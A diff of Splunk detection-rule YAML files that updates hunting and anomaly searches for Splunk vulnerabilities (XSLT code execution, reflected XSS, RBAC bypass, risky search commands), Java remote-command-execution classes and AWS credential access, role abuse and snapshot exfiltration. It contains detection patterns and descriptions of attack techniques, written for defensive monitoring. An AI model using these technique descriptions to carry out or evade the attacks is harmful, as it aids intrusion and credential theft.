message: Vulnerable $version$ of Splunk Add-on Builder found - Upgrade Immediately.
message: Vulnerable $version$ of Splunk Add-on Builder found - Upgrade Immediately.
mitre_attack_id:
- T1082
observable:
@@ -34,10 +47,11 @@ tags:
risk_score: 100
required_fields:
- disabled
- core
- core
- version
- label
security_domain: endpoint
manual_test: This search uses a REST call against a running Splunk instance to fetch the versions of installed apps.
It cannot be replicated with a normal test or attack data.
manual_test: This search uses a REST call against a running Splunk instance to fetch
the versions of installed apps. It cannot be replicated with a normal test or
attack data.
@@ -1,14 +1,18 @@
name: Splunk protocol impersonation weak encryption selfsigned
id: c76c7a2e-df49-414a-bb36-dce2683770de
version: 1
date: '2022-05-26'
version: 2
date: '2024-05-21'
author: Rod Soto, Splunk
status: production
type: Hunting
description: On June 14th 2022, Splunk released vulnerability advisory addresing Python
TLS validation which was not set before Splunk version 9. This search displays events
showing WARNING of using Splunk issued default selfsigned certificates.
data_source:
description: The following analytic identifies the use of Splunk's default self-signed
certificates, which are flagged as insecure. It detects events from the `splunkd`
log where the event message indicates that an X509 certificate should not be used.
This activity is significant because using weak encryption and self-signed certificates
can expose the system to man-in-the-middle attacks and other security vulnerabilities.
If confirmed malicious, attackers could impersonate Splunk services, intercept sensitive
data, and compromise the integrity of the Splunk environment.
data_source:
- Splunk
search: '`splunkd` certificate event_message="X509 certificate* should not be used*"
| stats count by host CN component log_level | `splunk_protocol_impersonation_weak_encryption_selfsigned_filter`'
@@ -54,7 +58,8 @@ tags:
tests:
- name: True Positive Test
attack_data:
- data: https://raw.githubusercontent.com/splunk/attack_data/master/datasets/attack_techniques/T1558.004/splunk_protocol_impersonation_weak_encryption_selfsigned.txt
- data:
https://raw.githubusercontent.com/splunk/attack_data/master/datasets/attack_techniques/T1558.004/splunk_protocol_impersonation_weak_encryption_selfsigned.txt
source: /opt/splun/var/log/splunk/splunkd.log
sourcetype: splunkd
custom_index: _internal
@@ -1,14 +1,19 @@
name: Splunk protocol impersonation weak encryption simplerequest
id: 839d12a6-b119-4d44-ac4f-13eed95412c8
version: 1
date: '2022-05-24'
version: 2
date: '2024-05-23'
author: Rod Soto, Splunk
status: production
type: Hunting
description: On Splunk version 9 on Python3 client libraries verify server certificates
by default and use CA certificate store. This search warns a user about a failure
to validate a certificate using python3 request.
data_source:
description: The following analytic identifies instances where Splunk's Python3 client
libraries fail to validate SSL certificates properly. It leverages logs from `splunk_python`
to detect when "simpleRequest SSL certificate validation is enabled without hostname
verification." This activity is significant because improper SSL certificate validation
can expose the system to man-in-the-middle attacks, allowing attackers to intercept
or alter data. If confirmed malicious, this vulnerability could lead to unauthorized
access, data breaches, and potential system compromise. Upgrading to Splunk version
9 and configuring TLS hostname validation is recommended to mitigate this risk.
data_source:
- Splunk
search: '`splunk_python` "simpleRequest SSL certificate validation is enabled without
hostname verification" | stats count by host path | `splunk_protocol_impersonation_weak_encryption_simplerequest_filter`'
@@ -56,7 +61,8 @@ tags:
tests:
- name: True Positive Test
attack_data:
- data: https://raw.githubusercontent.com/splunk/attack_data/master/datasets/attack_techniques/T1558.004/splk_protocol_impersonation_weak_encryption_simplerequest.txt
- data:
https://raw.githubusercontent.com/splunk/attack_data/master/datasets/attack_techniques/T1558.004/splk_protocol_impersonation_weak_encryption_simplerequest.txt
source: /opt/splunk/var/log/splunk/splunkd.log
sourcetype: splunk_python
custom_index: _internal
@@ -1,48 +1,60 @@
name: Splunk RBAC Bypass On Indexing Preview REST Endpoint
id: bbe26f95-1655-471d-8abd-3d32fafa86f8
version: 1
date: '2023-05-10'
version: 2
date: '2024-05-15'
author: Rod Soto
status: production
type: Hunting
data_source:
- Splunk
description: An unauthorized user can use the /services/indexing/preview REST endpoint to overwrite search results if they know the search ID (SID) of an existing search job.
search: '`splunkda` method="POST" uri="*/services/indexing/preview*" | table host clientip status useragent user uri_path | `splunk_rbac_bypass_on_indexing_preview_rest_endpoint_filter`'
how_to_implement: This search does not require additional data ingestion. It requires the ability to search _internal index.
known_false_positives: This is a hunting search which provides verbose results against this endpoint. Operator must consider things such as IP address, useragent and user(specially low privelege) and host to investigate possible attack.
description: The following analytic identifies unauthorized attempts to use the /services/indexing/preview
REST endpoint in Splunk. It detects POST requests to this endpoint by monitoring
the _internal index for specific URI patterns. This activity is significant because
it indicates a potential RBAC (Role-Based Access Control) bypass, allowing unauthorized
users to overwrite search results if they know the search ID (SID) of an existing
job. If confirmed malicious, this could lead to data manipulation, unauthorized
access to sensitive information, and compromised integrity of search results.
search: '`splunkda` method="POST" uri="*/services/indexing/preview*" | table host
clientip status useragent user uri_path | `splunk_rbac_bypass_on_indexing_preview_rest_endpoint_filter`'
how_to_implement: This search does not require additional data ingestion. It requires
the ability to search _internal index.
known_false_positives: This is a hunting search which provides verbose results against
this endpoint. Operator must consider things such as IP address, useragent and user(specially
low privelege) and host to investigate possible attack.
references:
- https://advisory.splunk.com/
tags:
analytic_story:
- Splunk Vulnerabilities
- Splunk Vulnerabilities
asset_type: Endpoint
atomic_guid: []
confidence: 50
impact: 30
message: Review $clientip$ access to indexing preview endpoint from low privilege user
message: Review $clientip$ access to indexing preview endpoint from low privilege
user
mitre_attack_id:
- T1134
observable:
- name: clientip
type: IP Address
role:
- Attacker
- Attacker
product:
- Splunk Enterprise
risk_score: 15
required_fields:
- host
- clientip
- status
- useragent
- user
- uri_path
- host
- clientip
- status
- useragent
- user
- uri_path
security_domain: endpoint
tests:
- name: True Positive Test
attack_data:
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1134/splunk/splunk_rbac_bypass_on_indexing_preview_rest_endpoint.log
- data:
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1134/splunk/splunk_rbac_bypass_on_indexing_preview_rest_endpoint.log
source: splunkd_access.log
sourcetype: splunkd_access
custom_index: _internal
@@ -1,64 +1,68 @@
name: Splunk RCE via User XSLT
id: 6cb7e011-55fb-48e3-a98d-164fa854e37e
version: 1
date: '2023-11-22'
version: 2
date: '2024-05-16'
author: Marissa Bower, Chase Franklin, Rod Soto, Bhavin Patel, Eric McGinnis, Splunk
status: production
type: Hunting
data_source:
- Splunk
description: This search provides information to investigate possible remote code execution exploitation via
user-supplied Extensible Stylesheet Language Transformations (XSLT), affecting Splunk versions 9.1.x.
search: '`splunkd_ui` ((uri="*NO_BINARY_CHECK=1*" AND "*input.path=*.xsl*") OR uri="*dispatch*.xsl*") AND uri!= "*splunkd_ui*"
| rex field=uri "(?<string>=\s*([\S\s]+))"
| eval decoded_field=urldecode(string)
| eval action=case(match(status,"200"),"Allowed",match(status,"303|500|401|403|404|301|406"),"Blocked",1=1,"Unknown")
| stats count min(_time) as firstTime max(_time) as lastTime by clientip useragent uri decoded_field action host
| rename clientip as src, uri as dest_uri
| iplocation src
| fillnull value="N/A"
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| table firstTime, lastTime src, useragent, action, count, Country, Region, City, dest_uri, decoded_field'
how_to_implement: This detection does not require you to ingest any new data. The detection does
require the ability to search the _internal index.
known_false_positives: This search will provide information for investigation and hunting possible abuse of user-supplied XSLT.
There may be false positives and results should individually evaluated. Please evaluate the source IP and useragent responsible
data_source: []
description: The following analytic identifies potential remote code execution (RCE)
attempts via user-supplied Extensible Stylesheet Language Transformations (XSLT)
in Splunk versions 9.1.x. It detects this activity by analyzing `splunkd_ui` logs
for specific URI patterns and status codes indicative of XSLT injection attempts.
This activity is significant because successful exploitation could allow an attacker
to execute arbitrary code on the Splunk server. If confirmed malicious, this could
lead to full system compromise, unauthorized data access, and further lateral movement
within the network.
search: '`splunkd_ui` ((uri="*NO_BINARY_CHECK=1*" AND "*input.path=*.xsl*") OR uri="*dispatch*.xsl*")
AND uri!= "*splunkd_ui*" | rex field=uri "(?<string>=\s*([\S\s]+))" | eval decoded_field=urldecode(string)
| eval action=case(match(status,"200"),"Allowed",match(status,"303|500|401|403|404|301|406"),"Blocked",1=1,"Unknown")
| stats count min(_time) as firstTime max(_time) as lastTime by clientip useragent
uri decoded_field action host | rename clientip as src, uri as dest_uri | iplocation
src | fillnull value="N/A" | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`
| table firstTime, lastTime src, useragent, action, count, Country, Region, City,
dest_uri, decoded_field'
how_to_implement: This detection does not require you to ingest any new data. The
detection does require the ability to search the _internal index.
known_false_positives: This search will provide information for investigation and
hunting possible abuse of user-supplied XSLT. There may be false positives and results
should individually evaluated. Please evaluate the source IP and useragent responsible
for creating the requests.
references:
- https://advisory.splunk.com/advisories/SVD-2023-1104
cve:
- CVE-2023-46214
- https://advisory.splunk.com/advisories/SVD-2023-1104
cve:
- CVE-2023-46214
tags:
analytic_story:
- Splunk Vulnerabilities
- Splunk Vulnerabilities
asset_type: Endpoint
confidence: 80
impact: 80
message: Potential Remote Code Execution via XLST from $src$ using useragent - $useragent$
mitre_attack_id:
- T1210
- T1210
observable:
- name: src
type: IP Address
role:
- Attacker
- name: src
type: IP Address
role:
- Attacker
product:
- Splunk Enterprise
- Splunk Enterprise Security
- Splunk Cloud
- Splunk Enterprise
- Splunk Enterprise Security
- Splunk Cloud
risk_score: 64
required_fields:
- uri
- clientip
- useragent
- action
- host
- uri
- clientip
- useragent
- action
- host
security_domain: endpoint
tests:
- name: True Positive Test
attack_data:
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1210/splunk/splunk_rce_via_user_xslt_splunkd_ui_access.log
- data:
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1210/splunk/splunk_rce_via_user_xslt_splunkd_ui_access.log
source: /opt/splunk/var/log/splunk/splunkd_ui_access.log
sourcetype: splunkd_ui_access
custom_index: _internal
@@ -1,14 +1,19 @@
name: Splunk Reflected XSS in the templates lists radio
id: d532d105-c63f-4049-a8c4-e249127ca425
version: 1
date: '2022-10-11'
version: 2
date: '2024-05-23'
author: Rod Soto, Chase Franklin
status: production
type: Hunting
description: Splunk versions below 8.1.12,8.2.9 and 9.0.2 are vulnerable to reflected
cross site scripting (XSS). A View allows for a Reflected Cross Site scripting via
JavaScript Object Notation (JSON) in a query parameter when ouput_mode=radio.
data_source:
description: The following analytic identifies potential reflected cross-site scripting
(XSS) attempts in Splunk versions below 8.1.12, 8.2.9, and 9.0.2. It detects when
a query parameter with `output_mode=radio` is used in a URI, leveraging `splunkd_webx`
logs with status 200 and non-null URI queries. This activity is significant as it
can indicate an attempt to exploit a known vulnerability, potentially allowing attackers
to execute arbitrary JavaScript in the context of the user's browser. If confirmed
malicious, this could lead to unauthorized actions, data theft, or further compromise
of the affected Splunk instance.
data_source:
- Splunk
search: '`splunkd_webx` user=admin status=200 uri=*/lists/entities/x/ui/views* uri_query!=null
| stats count earliest(_time) as event_time values(status) as status values(clientip)
@@ -55,7 +60,8 @@ tags:
tests:
- name: True Positive Test
attack_data:
- data: https://raw.githubusercontent.com/splunk/attack_data/master/datasets/attack_techniques/T1189/splunk/splunk_reflected_xss_in_templates_lists_radio.txt
- data:
https://raw.githubusercontent.com/splunk/attack_data/master/datasets/attack_techniques/T1189/splunk/splunk_reflected_xss_in_templates_lists_radio.txt
source: /opt/splunk/var/log/splunk/web_access.log
sourcetype: splunk_web_access
custom_index: _internal
@@ -1,24 +1,28 @@
name: Splunk risky Command Abuse disclosed february 2023
id: ee69374a-d27e-4136-adac-956a96ff60fd
version: 2
date: '2024-01-22'
version: 3
date: '2024-05-05'
author: Chase Franklin, Rod Soto, Eric McGinnis, Splunk
status: production
type: Hunting
description: This search looks for a variety of high-risk commands throughout
a number of different Splunk Vulnerability Disclosures. Please refer to the
following URL for additional information on these disclosures - https://advisory.splunk.com
data_source:
description: The following analytic identifies the execution of high-risk commands
associated with various Splunk vulnerability disclosures. It leverages the Splunk_Audit.Search_Activity
datamodel to detect ad-hoc searches by non-system users that match known risky commands.
This activity is significant for a SOC as it may indicate attempts to exploit known
vulnerabilities within Splunk, potentially leading to unauthorized access or data
exfiltration. If confirmed malicious, this could allow attackers to execute arbitrary
code, escalate privileges, or persist within the environment, posing a severe threat
to the organization's security posture.
data_source:
- Splunk
search: '| tstats fillnull_value="N/A" count min(_time) as firstTime max(_time) as lastTime from datamodel=Splunk_Audit.Search_Activity
where Search_Activity.search_type=adhoc Search_Activity.user!=splunk-system-user
by Search_Activity.search Search_Activity.info Search_Activity.total_run_time Search_Activity.user
Search_Activity.search_type | `drop_dm_object_name(Search_Activity)` | lookup splunk_risky_command
splunk_risky_command as search output splunk_risky_command description vulnerable_versions
CVE other_metadata | where splunk_risky_command != "false"
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `splunk_risky_command_abuse_disclosed_february_2023_filter`'
search: '| tstats fillnull_value="N/A" count min(_time) as firstTime max(_time) as
lastTime from datamodel=Splunk_Audit.Search_Activity where Search_Activity.search_type=adhoc
Search_Activity.user!=splunk-system-user by Search_Activity.search Search_Activity.info
Search_Activity.total_run_time Search_Activity.user Search_Activity.search_type
| `drop_dm_object_name(Search_Activity)` | lookup splunk_risky_command splunk_risky_command
as search output splunk_risky_command description vulnerable_versions CVE other_metadata
| where splunk_risky_command != "false" | `security_content_ctime(firstTime)` |
`security_content_ctime(lastTime)` | `splunk_risky_command_abuse_disclosed_february_2023_filter`'
how_to_implement: Requires implementation of Splunk_Audit.Search_Activity datamodel.
known_false_positives: This search encompasses many commands.
references:
@@ -68,25 +72,29 @@ tags:
tests:
- name: True Positive Test
attack_data:
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1548/splunk/splunk_createrss_command_abuse.log
- data:
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1548/splunk/splunk_createrss_command_abuse.log
source: audittrail
sourcetype: audittrail
custom_index: _audit
- name: True Positive Test runshellscript abuse
attack_data:
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1548/splunk/splunk_runshellscript_abuse.log
- data:
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1548/splunk/splunk_runshellscript_abuse.log
source: audittrail
sourcetype: audittrail
custom_index: _audit
- name: True Positive Test Additional runshellscript abuse
attack_data:
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1202/splunk/splunk_cmd_injection_using_external_lookups_audittrail.log
- data:
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1202/splunk/splunk_cmd_injection_using_external_lookups_audittrail.log
source: audittrail
sourcetype: audittrail
custom_index: _audit
- name: True Positive Test mrollup abuse
attack_data:
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1059/splunk/splunk_mrollup_abuse_audittrail.log
- data:
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1059/splunk/splunk_mrollup_abuse_audittrail.log
source: audittrail
sourcetype: audittrail
custom_index: _audit
custom_index: _audit
@@ -1,12 +1,18 @@
name: Suspicious Java Classes
id: 6ed33786-5e87-4f55-b62c-cb5f1168b831
version: 1
date: '2018-12-06'
version: 2
date: '2024-05-19'
author: Jose Hernandez, Splunk
status: experimental
type: Anomaly
description: This search looks for suspicious Java classes that are often used to
exploit remote command execution in common Java frameworks, such as Apache Struts.
description: The following analytic identifies suspicious Java classes often used
for remote command execution exploits in Java frameworks like Apache Struts. It
detects this activity by analyzing HTTP POST requests with specific content patterns
using Splunk's `stream_http` data source. This behavior is significant because it
may indicate an attempt to exploit vulnerabilities in web applications, potentially
leading to unauthorized remote code execution. If confirmed malicious, this activity
could allow attackers to execute arbitrary commands on the server, leading to data
breaches, system compromise, and further network infiltration.
data_source: []
search: '`stream_http` http_method=POST http_content_length>1 | regex form_data="(?i)java\.lang\.(?:runtime|processbuilder)"
| rename src_ip as src | stats count earliest(_time) as firstTime, latest(_time)
@@ -1,14 +1,19 @@
name: Abnormally High Number Of Cloud Infrastructure API Calls
id: 0840ddf1-8c89-46ff-b730-c8d6722478c0
version: 1
date: '2020-09-07'
version: 2
date: '2024-05-12'
author: David Dorsey, Splunk
status: experimental
type: Anomaly
description: This search will detect a spike in the number of API calls made to your
cloud infrastructure environment by a user.
data_source:
- AWS CloudTrail
description: The following analytic detects a spike in the number of API calls made
to your cloud infrastructure by a user. It leverages cloud infrastructure logs and
compares the current API call volume against a baseline probability density function
to identify anomalies. This activity is significant because an unusual increase
in API calls can indicate potential misuse or compromise of cloud resources. If
confirmed malicious, this could lead to unauthorized access, data exfiltration,
or disruption of cloud services, posing a significant risk to the organization's
cloud environment.
data_source: []
search: '| tstats count as api_calls values(All_Changes.command) as command from datamodel=Change
where All_Changes.user!=unknown All_Changes.status=success by All_Changes.user _time
span=1h | `drop_dm_object_name("All_Changes")` | eval HourOfDay=strftime(_time,
@@ -23,7 +28,7 @@ search: '| tstats count as api_calls values(All_Changes.command) as command from
how_to_implement: You must be ingesting your cloud infrastructure logs. You also must
run the baseline search `Baseline Of Cloud Infrastructure API Calls Per User` to
create the probability density function.
known_false_positives: 'None.'
known_false_positives: None.
references: []
tags:
analytic_story:
@@ -56,7 +61,8 @@ tags:
tests:
- name: True Positive Test
attack_data:
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/abnormally_high_cloud_instances_launched/cloudtrail_behavioural_detections.json
- data:
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/abnormally_high_cloud_instances_launched/cloudtrail_behavioural_detections.json
sourcetype: aws:cloudtrail
source: aws_cloudtrail
update_timestamp: true
@@ -1,13 +1,18 @@
name: Abnormally High Number Of Cloud Security Group API Calls
id: d4dfb7f3-7a37-498a-b5df-f19334e871af
version: 1
date: '2020-09-07'
version: 2
date: '2024-05-22'
author: David Dorsey, Splunk
status: experimental
type: Anomaly
description: This search will detect a spike in the number of API calls made to your
cloud infrastructure environment about security groups by a user.
data_source:
description: The following analytic detects a spike in the number of API calls made
to cloud security groups by a user. It leverages data from the Change data model,
focusing on successful firewall-related changes. This activity is significant because
an abnormal increase in security group API calls can indicate potential malicious
activity, such as unauthorized access or configuration changes. If confirmed malicious,
this could allow an attacker to manipulate security group settings, potentially
exposing sensitive resources or disrupting network security controls.
data_source:
- AWS CloudTrail
search: '| tstats count as security_group_api_calls values(All_Changes.command) as
command from datamodel=Change where All_Changes.object_category=firewall AND All_Changes.status=success
@@ -58,7 +63,8 @@ tags:
tests:
- name: True Positive Test
attack_data:
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/abnormally_high_cloud_instances_launched/cloudtrail_behavioural_detections.json
- data:
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/abnormally_high_cloud_instances_launched/cloudtrail_behavioural_detections.json
sourcetype: aws:cloudtrail
source: aws_cloudtrail
update_timestamp: true
@@ -1,12 +1,17 @@
name: Amazon EKS Kubernetes cluster scan detection
id: 294c4686-63dd-4fe6-93a2-ca807626704a
version: 1
date: '2020-04-15'
version: 2
date: '2024-05-15'
author: Rod Soto, Splunk
status: experimental
type: Hunting
description: This search provides information of unauthenticated requests via user
agent, and authentication data against Kubernetes cluster in AWS
description: The following analytic detects unauthenticated requests to an Amazon
EKS Kubernetes cluster, specifically identifying actions by the "system:anonymous"
user. It leverages AWS CloudWatch Logs data, focusing on user agents and authentication
details. This activity is significant as it may indicate unauthorized scanning or
probing of the Kubernetes cluster, which could be a precursor to an attack. If confirmed
malicious, this could lead to unauthorized access, data exfiltration, or disruption
of services within the Kubernetes environment.
data_source: []
search: '`aws_cloudwatchlogs_eks` "user.username"="system:anonymous" userAgent!="AWS
Security Scanner" | rename sourceIPs{} as src_ip | stats count min(_time) as firstTime
@@ -1,14 +1,19 @@
name: AWS Credential Access GetPasswordData
id: 4d347c4a-306e-41db-8d10-b46baf71b3e2
version: 1
date: '2022-08-10'
version: 2
date: '2024-05-21'
author: Bhavin Patel, Splunk
status: production
type: Anomaly
description: This detection analytic identifies more than 10 GetPasswordData API calls
made to your AWS account with a time window of 5 minutes. Attackers can retrieve
the encrypted administrator password for a running Windows instance.
data_source:
description: The following analytic identifies more than 10 GetPasswordData API calls
within a 5-minute window in your AWS account. It leverages AWS CloudTrail logs to
detect this activity by counting the distinct instance IDs accessed. This behavior
is significant as it may indicate an attempt to retrieve encrypted administrator
passwords for running Windows instances, which is a critical security concern. If
confirmed malicious, attackers could gain unauthorized access to administrative
credentials, potentially leading to full control over the affected instances and
further compromise of the AWS environment.
data_source:
- AWS CloudTrail GetPasswordData
search: '`cloudtrail` eventName=GetPasswordData eventSource = ec2.amazonaws.com | bin
_time span=5m | stats count values(errorCode) as errorCode dc(requestParameters.instanceId)
@@ -63,7 +68,8 @@ tags:
tests:
- name: True Positive Test
attack_data:
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1552/aws_getpassworddata/aws_cloudtrail_events.json
- data:
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1552/aws_getpassworddata/aws_cloudtrail_events.json
source: aws_cloudtrail
sourcetype: aws:cloudtrail
update_timestamp: true
@@ -1,12 +1,18 @@
name: AWS Cross Account Activity From Previously Unseen Account
id: 21193641-cb96-4a2c-a707-d9b9a7f7792b
version: 1
date: '2020-05-28'
version: 2
date: '2024-05-16'
author: Rico Valdez, Splunk
status: experimental
type: Anomaly
description: This search looks for AssumeRole events where an IAM role in a different
account is requested for the first time.
description: The following analytic identifies AssumeRole events where an IAM role
in a different AWS account is accessed for the first time. It detects this activity
by analyzing authentication logs and comparing the requesting and requested account
IDs, flagging new cross-account activities. This behavior is significant because
unauthorized cross-account access can indicate potential lateral movement or privilege
escalation attempts. If confirmed malicious, an attacker could gain unauthorized
access to resources in another account, potentially leading to data exfiltration,
service disruption, or further compromise of the AWS environment.
data_source: []
search: '| tstats min(_time) as firstTime max(_time) as lastTime from datamodel=Authentication
where Authentication.signature=AssumeRole by Authentication.vendor_account Authentication.user
@@ -62,7 +68,8 @@ tags:
tests:
- name: True Positive Test
attack_data:
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/abnormally_high_cloud_instances_launched/cloudtrail_behavioural_detections.json
- data:
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/abnormally_high_cloud_instances_launched/cloudtrail_behavioural_detections.json
sourcetype: aws:cloudtrail
source: aws_cloudtrail
update_timestamp: true
@@ -1,12 +1,17 @@
name: aws detect attach to role policy
id: 88fc31dd-f331-448c-9856-d3d51dd5d3a1
version: 1
date: '2020-07-27'
version: 2
date: '2024-05-12'
author: Rod Soto, Splunk
status: experimental
type: Hunting
description: This search provides detection of an user attaching itself to a different
role trust policy. This can be used for lateral movement and escalation of privileges.
description: The following analytic identifies a user attaching a policy to a different
role's trust policy in AWS. It leverages CloudWatch logs to detect the `attach policy`
event, extracting relevant fields such as `policyArn`, `sourceIPAddress`, and `userIdentity`.
This activity is significant as it can indicate attempts at lateral movement or
privilege escalation within the AWS environment. If confirmed malicious, an attacker
could gain elevated permissions, potentially compromising sensitive resources and
data within the AWS infrastructure.
data_source: []
search: '`aws_cloudwatchlogs_eks` attach policy| spath requestParameters.policyArn
| table sourceIPAddress user_access_key userIdentity.arn userIdentity.sessionContext.sessionIssuer.arn
@@ -1,13 +1,16 @@
name: aws detect permanent key creation
id: 12d6d713-3cb4-4ffc-a064-1dca3d1cca01
version: 1
date: '2020-07-27'
version: 2
date: '2024-05-23'
author: Rod Soto, Splunk
status: experimental
type: Hunting
description: This search provides detection of accounts creating permanent keys. Permanent
keys are not created by default and they are only needed for programmatic calls.
Creation of Permanent key is an important event to monitor.
description: The following analytic detects the creation of permanent access keys
in AWS accounts. It leverages CloudWatch logs to identify events where the `CreateAccessKey`
action is performed by IAM users. Monitoring the creation of permanent keys is crucial
as they are not created by default and are typically used for programmatic access.
If confirmed malicious, this activity could allow attackers to gain persistent access
to AWS resources, potentially leading to unauthorized actions and data exfiltration.
data_source: []
search: '`aws_cloudwatchlogs_eks` CreateAccessKey | spath eventName | search eventName=CreateAccessKey
"userIdentity.type"=IAMUser | table sourceIPAddress userName userIdentity.type userAgent
@@ -1,13 +1,18 @@
name: aws detect sts assume role abuse
id: 8e565314-b6a2-46d8-9f05-1a34a176a662
version: 1
date: '2020-07-27'
version: 2
date: '2024-05-20'
author: Rod Soto, Splunk
status: experimental
type: Hunting
description: This search provides detection of suspicious use of sts:AssumeRole. These
tokens can be created on the go and used by attackers to move laterally and escalate
privileges.
description: The following analytic identifies suspicious use of the AWS STS AssumeRole
action. It leverages AWS CloudTrail logs to detect instances where roles are assumed,
focusing on specific fields like source IP address, user ARN, and role names. This
activity is significant because attackers can use assumed roles to move laterally
within the AWS environment and escalate privileges. If confirmed malicious, this
could allow attackers to gain unauthorized access to sensitive resources, execute
code, or further entrench themselves within the environment, leading to potential
data breaches or service disruptions.
data_source: []
search: '`cloudtrail` user_type=AssumedRole userIdentity.sessionContext.sessionIssuer.type=Role
| table sourceIPAddress userIdentity.arn user_agent user_access_key status action
@@ -1,13 +1,17 @@
name: aws detect sts get session token abuse
id: 85d7b35f-b8b5-4b01-916f-29b81e7a0551
version: 1
date: '2020-07-27'
version: 2
date: '2024-05-14'
author: Rod Soto, Splunk
status: experimental
type: Hunting
description: This search provides detection of suspicious use of sts:GetSessionToken.
These tokens can be created on the go and used by attackers to move laterally and
escalate privileges.
description: The following analytic identifies the suspicious use of the AWS STS GetSessionToken
API call. It leverages CloudWatch logs to detect instances where this API is invoked,
focusing on fields such as source IP address, event time, user identity, and status.
This activity is significant because attackers can use these tokens to move laterally
within the AWS environment and escalate privileges. If confirmed malicious, this
could lead to unauthorized access and control over AWS resources, potentially compromising
sensitive data and critical infrastructure.
data_source: []
search: '`aws_cloudwatchlogs_eks` ASIA userIdentity.type=IAMUser| spath eventName
| search eventName=GetSessionToken | table sourceIPAddress eventTime userIdentity.arn
@@ -1,14 +1,18 @@
name: AWS Detect Users with KMS keys performing encryption S3
id: 884a5f59-eec7-4f4a-948b-dbde18225fdc
version: 2
date: '2022-11-11'
version: 3
date: '2024-05-18'
author: Rod Soto, Patrick Bareiss Splunk
status: production
type: Anomaly
description: This search provides detection of users with KMS keys performing encryption
specifically against S3 buckets.
data_source:
- AWS CloudTrail CopyObject
description: The following analytic identifies users with KMS keys performing encryption
operations on S3 buckets. It leverages AWS CloudTrail logs to detect the `CopyObject`
event where server-side encryption with AWS KMS is specified. This activity is significant
as it may indicate unauthorized or suspicious encryption of data, potentially masking
exfiltration or tampering efforts. If confirmed malicious, an attacker could be
encrypting sensitive data to evade detection or preparing it for exfiltration, posing
a significant risk to data integrity and confidentiality.
data_source: []
search: '`cloudtrail` eventName=CopyObject requestParameters.x-amz-server-side-encryption="aws:kms"
| rename requestParameters.bucketName AS bucketName, requestParameters.x-amz-copy-source
AS src_file, requestParameters.key AS dest_file | stats count min(_time) as firstTime
@@ -56,7 +60,8 @@ tags:
tests:
- name: True Positive Test
attack_data:
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1486/s3_file_encryption/aws_cloudtrail_events.json
- data:
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1486/s3_file_encryption/aws_cloudtrail_events.json
sourcetype: aws:cloudtrail
source: aws_cloudtrail
update_timestamp: true
@@ -1,17 +1,25 @@
name: AWS EC2 Snapshot Shared Externally
id: 2a9b80d3-6340-4345-b5ad-290bf3d222c4
version: 3
date: '2023-03-20'
version: 4
date: '2024-05-07'
author: Bhavin Patel, Splunk
status: production
type: TTP
description: The following analytic utilizes AWS CloudTrail events to identify when
an EC2 snapshot permissions are modified to be shared with a different AWS account.
This method is used by adversaries to exfiltrate the EC2 snapshot.
data_source:
description: The following analytic detects when an EC2 snapshot is shared with an
external AWS account by analyzing AWS CloudTrail events. This detection method leverages
CloudTrail logs to identify modifications in snapshot permissions, specifically
when the snapshot is shared outside the originating AWS account. This activity is
significant as it may indicate an attempt to exfiltrate sensitive data stored in
the snapshot. If confirmed malicious, an attacker could gain unauthorized access
to the snapshot's data, potentially leading to data breaches or further exploitation
of the compromised information.
data_source:
- AWS CloudTrail ModifySnapshotAttribute
search: '`cloudtrail` eventName=ModifySnapshotAttribute | rename requestParameters.createVolumePermission.add.items{}.userId
as requested_account_id | search requested_account_id != NULL | eval match=if(requested_account_id==aws_account_id,"Match","No Match") | table _time user_arn src_ip requestParameters.attributeType requested_account_id aws_account_id match vendor_region user_agent userIdentity.principalId | where match = "No Match" | `aws_ec2_snapshot_shared_externally_filter` '
as requested_account_id | search requested_account_id != NULL | eval match=if(requested_account_id==aws_account_id,"Match","No
Match") | table _time user_arn src_ip requestParameters.attributeType requested_account_id
aws_account_id match vendor_region user_agent userIdentity.principalId | where match
= "No Match" | `aws_ec2_snapshot_shared_externally_filter` '
how_to_implement: You must install splunk AWS add on and Splunk App for AWS. This
search works with AWS CloudTrail logs.
known_false_positives: It is possible that an AWS admin has legitimately shared a
@@ -63,7 +71,8 @@ tags:
tests:
- name: True Positive Test
attack_data:
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1537/aws_snapshot_exfil/aws_cloudtrail_events.json
- data:
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1537/aws_snapshot_exfil/aws_cloudtrail_events.json
sourcetype: aws:cloudtrail
source: aws_cloudtrail
update_timestamp: true
@@ -1,17 +1,33 @@
name: AWS ECR Container Scanning Findings High
id: 30a0e9f8-f1dd-4f9d-8fc2-c622461d781c
version: 2
date: '2023-11-09'
version: 3
date: '2024-05-12'
author: Patrick Bareiss, Splunk
status: production
type: TTP
